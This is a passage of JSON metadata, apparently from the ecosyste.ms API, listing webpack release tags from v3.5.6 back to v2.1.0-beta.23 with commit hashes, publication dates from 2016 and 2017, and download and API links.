ste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.